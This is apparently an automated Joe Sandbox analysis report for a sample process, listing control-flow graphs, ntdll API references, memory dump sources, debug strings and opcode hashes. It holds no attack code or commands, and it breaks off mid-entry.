                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:3
                                  Total number of Limit Nodes:0
                                  execution_graph 62338 1192c1d 62339 1192c1f LdrInitializeThunk 62338->62339 62340 1192b60 LdrInitializeThunk

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 1192c0a-1192c0f 1 1192c1f-1192c26 LdrInitializeThunk 0->1 2 1192c11-1192c18 0->2 2->1
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011AFD4F,000000FF,00000024,01246634,00000004,00000000,?,-00000018,7D810F61,?,?,01168B12,?,?,?,?), ref: 01192C24
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4 1192b60-1192b6c LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011C0DBD,?,?,?,?,011B4302), ref: 01192B6A
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 7 1192df0-1192dfc LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011CE73E,0000005A,0122D040,00000020,00000000,0122D040,00000080,011B4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0119AE00), ref: 01192DFA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 1192c1d-1192c26 LdrInitializeThunk
                                  APIs
                                  • LdrInitializeThunk.NTDLL(011AFD4F,000000FF,00000024,01246634,00000004,00000000,?,-00000018,7D810F61,?,?,01168B12,?,?,?,?), ref: 01192C24
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 11935c0-11935cc LdrInitializeThunk
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9 429077-429079 10 42907b-429093 9->10 11 429029-42903b 9->11 12 429099-4290d0 10->12 12->12 13 4290d2-4290da 12->13
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2246572462.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_429000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 14 429000-429027 16 42902d-42903b 14->16
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2246572462.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_429000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17 1194a80-1194a8b 18 1194a8d-1194a99 RtlDebugPrintTimes 17->18 19 1194a9f-1194aa6 17->19 18->19 24 1194b25-1194b26 18->24 20 1194aa8-1194aae 19->20 21 1194aaf-1194ab6 call 117f5a0 19->21 26 1194ab8-1194b22 call 1181e46 * 2 21->26 27 1194b23 21->27 26->27 27->24
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
                                  • API String ID: 3446177414-2083360775

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID:
                                  • API String ID: 48624451-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 011B79D0, 011B79F5
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B79D5
                                  • SsHd, xrefs: 0116A3E4
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B79FA
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-929470617

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  Strings
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 011B9341, 011B9366
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B9346
                                  • GsHd, xrefs: 0116D874
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011B936B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                  • API String ID: 3446177414-576511823
                                  • Opcode ID: dd7a471761984d228d5852cfb93cf01c0239fadf49b26f0a7c56c5615d74efa9
                                  • Instruction ID: 3cb4999617e38be849b8d7c5d2d264d53987f98a9e976da03742c469a95f7e09
                                  • Opcode Fuzzy Hash: dd7a471761984d228d5852cfb93cf01c0239fadf49b26f0a7c56c5615d74efa9
                                  • Instruction Fuzzy Hash: 2CE1C5707083468FDB1CCF68D4C0B6ABBE9BF88318F04492DEA958B291D772D955CB42

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                  • Instruction ID: d3661a324fcbea718fa02b31f587987d73418be826cb2f1c25f0fcd994395905
                                  • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                  • Instruction Fuzzy Hash: 9B81A370E092499EEF2D8E6CE891FFEBBB1AF45350F184259D871A72D1C7349840CB59

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  • Opcode ID: 03a94850c8b1fbb7ea26bae85df9866fc20a64f755ed8a77dbe44c57c584402a
                                  • Instruction ID: 1fb8600febace6a0a757d59d085944947022ef87d1ea104376c82687728cd63f
                                  • Opcode Fuzzy Hash: 03a94850c8b1fbb7ea26bae85df9866fc20a64f755ed8a77dbe44c57c584402a
                                  • Instruction Fuzzy Hash: 7681FB75D00269DBDB399B54CC84BEEBAB8AB48754F0041DAEA19B7240D7705E84CFA1

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0Iv$0Iv$0Iv$X
                                  • API String ID: 3446177414-728256981
                                  • Opcode ID: 52ca78e0ae1fa594d62aa3738923fac60c882224b7a637acde563ec2368da89f
                                  • Instruction ID: 4a726854128e1d32aea4d6ae690935459133d4c902423345ca37e344a7593b86
                                  • Opcode Fuzzy Hash: 52ca78e0ae1fa594d62aa3738923fac60c882224b7a637acde563ec2368da89f
                                  • Instruction Fuzzy Hash: 0C31C03690020AEFCF26DF58E944B8E3BB1BBC9358F004019FD2996245D3789A92CF85
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-56086060
                                  • Opcode ID: 8740359161b14cf57cca8a40c2791f5fd994bbd5388c8fe3ab0ab8a4d2489d64
                                  • Instruction ID: 0b145f05ff9c9cdc57ac7df19db898f0aec18ee5964f821023076f5e4fa9efcf
                                  • Opcode Fuzzy Hash: 8740359161b14cf57cca8a40c2791f5fd994bbd5388c8fe3ab0ab8a4d2489d64
                                  • Instruction Fuzzy Hash: 51417670600646DFDB2EDFB8C889BBAB7B4EF15724F048069E80197391C774A881CB91
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 011D4899
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011D4888
                                  • LdrpCheckRedirection, xrefs: 011D488F
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  • Opcode ID: 2c32deaaa00c5d199c0cc74aea9cd7b46f8849bc48a9cf21b0a71bac00c83505
                                  • Instruction ID: 4868098952a326ba4fb192472251a257f136ad95abe406d5064590ec726065c0
                                  • Opcode Fuzzy Hash: 2c32deaaa00c5d199c0cc74aea9cd7b46f8849bc48a9cf21b0a71bac00c83505
                                  • Instruction Fuzzy Hash: 5F41B232A046519FCB29CE9CD841A277BE5EF49A90F06056DED89EBF51D730E800CB91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-3526935505
                                  • Opcode ID: 3dbb2298d6a94eb694bf6db8efa05ead293ab0a4d0ce8ee4d6c5f57fe1c654bb
                                  • Instruction ID: 169151b2ac6e63de0dd986dfd7d93527412089d070cd736db687479973affa79
                                  • Opcode Fuzzy Hash: 3dbb2298d6a94eb694bf6db8efa05ead293ab0a4d0ce8ee4d6c5f57fe1c654bb
                                  • Instruction Fuzzy Hash: 19310535104B95EFDB2EDB68DC89BA67BF4EF12B14F044099E44287792C7B4A881C752
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $
                                  • API String ID: 3446177414-3993045852
                                  • Opcode ID: 8063be562284c226de7e3062ad12b345b818d2d518c87546235fd686ee9a6297
                                  • Instruction ID: 551b66d81590a65cca15538324e961ae39460baa44cb66eefcd9839cf37d0baf
                                  • Opcode Fuzzy Hash: 8063be562284c226de7e3062ad12b345b818d2d518c87546235fd686ee9a6297
                                  • Instruction Fuzzy Hash: AC115E36A04618EBCF19AFA4F848A9D7F71FF44764F108119F92A676D0CB725A40CB40
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c13bbc623deab4337cc8298183704478d76d90ed81197c53f4d173867d93f7d
                                  • Instruction ID: bbc788eccefa8bdc1c34ec4f75b03d33937da03f0fac364c838417974d7ab0a6
                                  • Opcode Fuzzy Hash: 4c13bbc623deab4337cc8298183704478d76d90ed81197c53f4d173867d93f7d
                                  • Instruction Fuzzy Hash: FEE11F75D00209CFCF29CFA9D984AAEBBF1BF48314F24456AE566A7361D730A842CF11
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.2247865042.00000000011A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01120000, based on PE: true
                                  • Associated: 0000000E.00000002.2247865042.0000000001120000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001127000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001146000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011A0000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.00000000011E2000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001243000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 0000000E.00000002.2247865042.0000000001249000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_1120000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: c4c23c3baf9196c446f6ce99e7ea8e7c6a623188c2ae090b68c864654cc65495
                                  • Instruction ID: 620c1dc5fbcdef05d8397d1e3567e90ea0aae642f1b63577e6fcbb7a98e96287
                                  • Opcode Fuzzy Hash: c4c23c3baf9196c446f6ce99e7ea8e7c6a623188c2ae090b68c864654cc65495
                                  • Instruction Fuzzy Hash: C5714871E0021A9FDF09CFA4C984ADDBBB6BF58B14F14402EE905FB254D774A906CB51
                                  APIs
                                  Memory Dump Source
